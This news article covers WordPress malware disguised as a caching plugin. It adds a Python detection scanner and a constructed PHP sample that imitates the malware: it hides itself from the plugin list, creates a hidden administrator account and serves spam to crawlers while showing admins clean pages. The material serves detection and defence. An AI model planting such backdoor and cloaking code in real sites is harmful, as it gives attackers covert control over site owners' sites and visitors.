Another major WordPress security flaw is putting thousands of websites at risk

Cybersecurity researchers at Defiant recently discovered a new strain of malware that targets WordPress by masquerading as an optimization plugin.

According to the researchers, the malware's purpose is to give the attackers persistent administrative access to the compromised WordPress site.

While cleaning a website in the summer of 2022, the researchers found a plugin whose "professional-looking" opening comment described it as a caching tool that reduces load on the server and shortens page load times. The researchers explained that this framing is deliberate: an administrator who inspects the files manually is not meant to become suspicious. For the same reason, the plugin also removes itself from the list of active plugins shown in the WordPress dashboard, so it does not appear alongside the site's legitimate plugins.

Monetizing compromised websites

The malware can do a number of things: create a 'superadmin' account with a hardcoded password; detect bot traffic and serve it spam content (sometimes misidentifying real users as bots, which causes a spike in spam reports from them); replace content on the site and insert spam links or buttons, while showing the unmodified pages to logged-in site administrators so they don't notice; manage plugins (remotely activating or deactivating them, and erasing any traces of its own presence); and remotely activate its various malicious functions on command.
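Because the plugin hides itself from the dashboard's plugin list, the practical check is to read the plugin files on disk rather than trust the list. The following scanner is an added example written for this article, not code from Defiant or from the malware itself. It looks for the traits described above (a hook that removes the plugin from the `all_plugins` list, programmatic user creation with the administrator role, content branching on admin or crawler status, and fetching content from a remote URL) in PHP source. The two plugin sources it runs over are constructed for the example and only imitate the described behaviour; the placeholder password and `example.invalid` URLs are assumptions, not indicators taken from the real malware.

```python
import re
from pathlib import Path

# Heuristic indicators modelled on the behaviours described in the article.
# Each entry is (label, pattern); a file's "hits" are the labels whose
# pattern matches. Several of these appear in honest plugins too, so a
# single hit is not a verdict (see is_suspicious below).
INDICATORS = [
    ("hides itself from the plugin list",
     re.compile(r"add_filter\(\s*['\"]all_plugins['\"]")),
    ("creates a user programmatically",
     re.compile(r"\b(wp_create_user|wp_insert_user|wp_set_password)\s*\(")),
    ("assigns the administrator role",
     re.compile(r"(set_role|add_role)\s*\(\s*['\"]administrator['\"]"
                r"|['\"]role['\"]\s*=>\s*['\"]administrator['\"]")),
    ("branches on admin/logged-in status",
     re.compile(r"\b(current_user_can|is_admin|is_user_logged_in)\s*\(")),
    ("branches on crawler user agent",
     re.compile(r"HTTP_USER_AGENT[\s\S]{0,300}?(googlebot|bingbot|crawler|spider)", re.I)),
    ("fetches content from a remote URL",
     re.compile(r"\b(wp_remote_get|wp_remote_post|curl_init|file_get_contents)"
                r"\s*\(\s*['\"]https?://")),
]


def scan_source(src: str) -> list:
    """Return the labels of every indicator that matches one PHP source file."""
    return [label for label, rx in INDICATORS if rx.search(src)]


def is_suspicious(hits: list) -> bool:
    """Self-hiding alone is damning; otherwise require three independent traits."""
    return "hides itself from the plugin list" in hits or len(hits) >= 3


def triage(sources: dict) -> dict:
    """Map file name -> hits for every file that is_suspicious() flags."""
    flagged = {}
    for name, src in sources.items():
        hits = scan_source(src)
        if is_suspicious(hits):
            flagged[name] = hits
    return flagged


def scan_plugin_dir(root) -> dict:
    """Read every *.php under a wp-content/plugins directory and triage it."""
    root = Path(root)
    return triage({str(p.relative_to(root)): p.read_text(errors="replace")
                   for p in root.rglob("*.php")})


# Constructed sample imitating the described traits (not the real malware).
CONSTRUCTED_MALICIOUS = r"""<?php
/*
Plugin Name: Speed Cache Optimizer
Description: Lightweight caching layer that reduces server load and page load time.
*/
add_filter('all_plugins', function ($plugins) {
    unset($plugins[plugin_basename(__FILE__)]);   // vanish from the plugin list
    return $plugins;
});
add_action('init', function () {
    if (!username_exists('superadmin')) {
        $id = wp_create_user('superadmin', 'PLACEHOLDER-PASSWORD', 'x@example.invalid');
        (new WP_User($id))->set_role('administrator');
    }
});
add_filter('the_content', function ($html) {
    if (current_user_can('manage_options')) return $html;   // admins see clean pages
    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
    if (preg_match('/googlebot|bingbot/i', $ua)) {
        return wp_remote_retrieve_body(wp_remote_get('https://example.invalid/spam'));
    }
    return $html . '<a href="https://example.invalid">buy now</a>';
});
"""

# Constructed benign cache plugin: it also checks admin status, which on its
# own must not be enough to flag it.
CONSTRUCTED_BENIGN = r"""<?php
/*
Plugin Name: Honest Page Cache
*/
add_action('template_redirect', function () {
    if (is_admin() || is_user_logged_in()) return;   // never cache logged-in views
    $key = 'page_' . md5($_SERVER['REQUEST_URI']);
    $html = get_transient($key);
    if ($html !== false) { echo $html; exit; }
    ob_start(function ($buf) use ($key) { set_transient($key, $buf, 600); return $buf; });
});
"""

if __name__ == "__main__":
    samples = {"honest-cache/cache.php": CONSTRUCTED_BENIGN,
               "speed-cache/plugin.php": CONSTRUCTED_MALICIOUS}
    for name, hits in triage(samples).items():
        print(name)
        for h in hits:
            print("  -", h)
```

Run `scan_plugin_dir("/var/www/html/wp-content/plugins")` on a live site to triage every plugin directory, including ones the dashboard no longer shows. Pair it with checks that do not depend on the plugin list either: `wp option get active_plugins` shows what the database actually loads, and `wp user list --role=administrator` surfaces any administrator account you did not create.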

“Taken together, these features give attackers everything they need to remotely monitor and monetize a victim site at the expense of one’s own SEO rankings and user privacy,” the researchers explained.

Defiant did not name the threat actor currently spreading the malware or estimate the number of infected websites. How the malware is distributed is also not known for certain; the researchers speculate that the attackers either brute force their way into WordPress sites and install the plugin, or log in with credentials stolen in previous attacks. There is also the possibility that other vulnerable plugins are abused to gain access.

Via BleepingComputer
